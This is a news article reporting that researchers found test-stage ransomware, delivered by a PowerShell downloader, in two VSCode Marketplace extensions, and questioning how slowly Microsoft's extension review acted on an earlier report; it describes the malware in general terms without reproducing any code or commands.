Cybersecurity researchers have identified ransomware hidden within two Visual Studio Code (VSCode) Marketplace extensions, raising concerns about the security of Microsoft’s extension approval system. The affected extensions, “ahban.shiba” and “ahban.cychelloworld,” were removed after being flagged, but not before they had been downloaded by users.
Despite Microsoft’s security protocols, the extensions were publicly accessible for an extended period. “Ahban.cychelloworld” was uploaded on 27 October 2024, while “ahban.shiba” became available on 17 February 2025. The VSCode Marketplace, which allows developers to integrate additional tools into Microsoft’s widely used Visual Studio Code platform, has now come under scrutiny for allowing these extensions to pass security checks.
Researchers at security firm ReversingLabs found that both extensions contained a PowerShell script that retrieved additional code from a remote Amazon Web Services (AWS) server. The downloaded script functioned as ransomware, though evidence suggests it was still in an early stage of development. Unlike traditional ransomware that locks down an entire system, this version specifically encrypted files found in C:\users%username%\Desktop\testShiba.
“Your files have been encrypted. Pay 1 ShibaCoin to ShibaWallet to recover them,” reads the Windows notification message after the completion of the encryption process.
No additional instructions or payment details were included, indicating that the malware might still have been undergoing testing.
Although Microsoft eventually removed the extensions, security researcher Italy Kruk from ExtensionTotal told BleepingComputer that their automated scanning system had flagged the malicious code much earlier. The company had alerted Microsoft but did not receive a response.
According to Kruk, the malicious code was introduced later. The initial version of “ahban.cychelloworld” did not contain ransomware but was updated in version 0.0.2, which became available on 24 November 2024.
“We reported ahban.cychelloworld to Microsoft on 25 November 2024 via an automatic report generated by our scanner,” Kruk told the publication.
Despite the alert, the extension remained accessible for several months, with five additional versions published, each containing the same ransomware payload.
Microsoft’s security review process faces scrutiny
The ability of these extensions to remain undetected for an extended period highlights concerns over Microsoft’s process for reviewing third-party software. The case has drawn attention to the effectiveness of security measures in the VSCode Marketplace, where developers rely on extensions to improve functionality.
Microsoft has faced previous criticism for both delays in addressing security threats and instances where non-malicious extensions were removed too quickly. A recent example involved two popular VSCode themes, namely ‘Material Theme – Free’ and ‘Material Theme Icons – Free’, which were removed after Microsoft detected obfuscated JavaScript. However, later analysis determined that the extensions were not malicious. Following backlash, Microsoft reinstated them and apologised, stating that its security scanning procedures would be improved to prevent future errors.
Read more: Ransomware groups exploit BioNTdrv.sys flaws to gain SYSTEM privileges on Windows
